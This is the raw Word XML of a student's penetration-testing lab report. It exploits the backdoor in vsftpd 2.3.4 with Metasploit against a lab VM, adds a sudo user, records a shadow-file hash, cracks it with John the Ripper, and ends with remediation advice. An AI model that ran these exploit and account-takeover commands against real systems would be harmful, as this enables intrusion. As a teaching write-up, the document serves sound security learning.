        <w:t>Running: Linux 2.6.X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B42A623" w14:textId="77777777" w:rsidR="0013646E" w:rsidRPr="0088446E" w:rsidRDefault="0013646E">
      <w:r w:rsidRPr="0088446E">
        <w:t xml:space="preserve"> OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0088446E">
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0088446E">
        <w:t>:/o:linux</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0088446E">
        <w:t>:linux_kernel:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D179768" w14:textId="77777777" w:rsidR="0013646E" w:rsidRPr="0088446E" w:rsidRDefault="0013646E">
      <w:r w:rsidRPr="0088446E">
        <w:t xml:space="preserve"> OS details: Linux 2.6.9 - 2.6.33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59961D55" w14:textId="5049D861" w:rsidR="0088446E" w:rsidRDefault="0013646E" w:rsidP="0013646E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013646E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Task 4- Exploitation of services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3476445E" w14:textId="77777777" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> 2.3.4 (Port 21 - FTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084F295" w14:textId="77777777" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7CA2178A" w14:textId="77777777" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C924E" w14:textId="77777777" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> set RHOST 192.168.160.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A0C063" w14:textId="716DFB3F" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> set RPORT 21 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0A75B9" w14:textId="58767CDB" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BEFDEC" w14:textId="6EA0DC8A" w:rsidR="00246332" w:rsidRDefault="00246332" w:rsidP="00246332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399C06" wp14:editId="7FC3A7F1">
            <wp:extent cx="5731510" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2084497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7167" name="Picture 20844971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C1C0" w14:textId="77777777" w:rsidR="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 5 - Create user with root permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6FF56C" w14:textId="7B7AB112" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>sanjana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68242E5B" w14:textId="77777777" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> password hello </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0AF68" w14:textId="633D1283" w:rsidR="00246332" w:rsidRPr="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00246332">
        <w:lastRenderedPageBreak/>
        <w:sym w:font="Symbol" w:char="F0D8"/>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>usermod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>aG</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t xml:space="preserve">Sanjana </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00246332">
        <w:t>anjana:$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t>y$j9T1zmLg0z5UJ60</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>RKnySiz.$</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00246332">
        <w:t>E8g9aHckcDLPRCuludKbXDDCFHvFN2j3pFFOWataTG.:20225:0:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00246332">
        <w:t>99999:7:::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="25897195" w14:textId="5FD0A302" w:rsidR="00246332" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 6 - Cracking password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206B0685" w14:textId="0C046131" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">nano </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>sanjana</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7860073F" w14:textId="77777777" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6716B104" w14:textId="7587C6E0" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">john </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>sanjana</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634C7E3B" w14:textId="26B9A48A" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">john </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>sanjana</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">_hash.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F9F64" w14:textId="5AD5386C" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4784E9A5" w14:textId="45215C7B" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2400E4BC" w14:textId="4A7C9077" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:t>1 password hash cracked, 0 left</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C2B82" w14:textId="77777777" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 7 – Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419EF85F" w14:textId="0AAB2E81" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="001B20F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:t>FTP Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24A209" w14:textId="342EBF03" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="001B20F4">
      <w:pPr>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">Current Version: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB775A" w14:textId="3A3E9745" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="001B20F4">
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> Latest Version: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> 3.0.5 (as of 2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B53E95" w14:textId="2B68FDC0" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="001B20F4">
      <w:pPr>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">: Version 2.3.4 is affected by a backdoor vulnerability where an attacker can gain a root shell if a malicious payload is sent. This is one of the most serious vulnerabilities in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08032B" w14:textId="5C8AAA40" w:rsidR="00246332" w:rsidRDefault="00246332" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65490C07" w14:textId="1E11F9A7" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00E10510">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://www.youtube.com/?feature=ytca</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D901160" w14:textId="77777777" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D28CB5" w14:textId="77777777" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978CC51" w14:textId="77777777" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Option 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve">Upgrade to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> 3.0.5 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B3CBF1" w14:textId="366CDD76" w:rsidR="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:sym w:font="Symbol" w:char="F0B7"/>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Option 2</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>: Disable FTP and use more secure alternatives like SFTP (via SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C10CDB" w14:textId="77777777" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="00246332">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25014D7B" w14:textId="77777777" w:rsidR="001B20F4" w:rsidRPr="001B20F4" w:rsidRDefault="001B20F4" w:rsidP="001B20F4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Major Learning From this project </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BBAB4" w14:textId="65BD2577" w:rsidR="002323AB" w:rsidRPr="003264A3" w:rsidRDefault="001B20F4" w:rsidP="003264A3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B20F4">
        <w:t>Through this project</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> I learned how to create and manage users in Linux and how their details are stored in system files. I understood how passwords are saved in hashed format and how they can be cracked using tools like John the Ripper with wordlists. I also used Nmap to scan systems for open ports, detect services running on them, and check the operating system. For this, I used commands like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> -v to find open ports, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> to find service versions, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> -O to detect the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t>OS..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B20F4">
        <w:t xml:space="preserve"> This hands-on work helped me understand system security better</w:t>
      </w:r>
      <w:r w:rsidRPr="001B20F4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002323AB" w:rsidRPr="003264A3" w:rsidSect="003264A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83A17"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E8A9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515C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F320C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70F1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E32CA62E"/>
    <w:lvl w:ilvl="0" w:tplc="B822AA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82490823">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1239244901">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="441344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AB"/>
    <w:rsid w:val="0013646E"/>
    <w:rsid w:val="001B20F4"/>
    <w:rsid w:val="001C2CDD"/>
    <w:rsid w:val="002323AB"/>
    <w:rsid w:val="00246332"/>
    <w:rsid w:val="00303A9F"/>
    <w:rsid w:val="003264A3"/>
    <w:rsid w:val="0053037D"/>
    <w:rsid w:val="00850F2D"/>
    <w:rsid w:val="0088446E"/>
    <w:rsid w:val="00F0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EC77"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{862F6107-2DB3-4AAA-B586-6F26929E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3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0F4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32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?feature=yt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Thawait</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sanjana Thawait</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2025-05-17T17:39:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-17T17:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-17T17:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>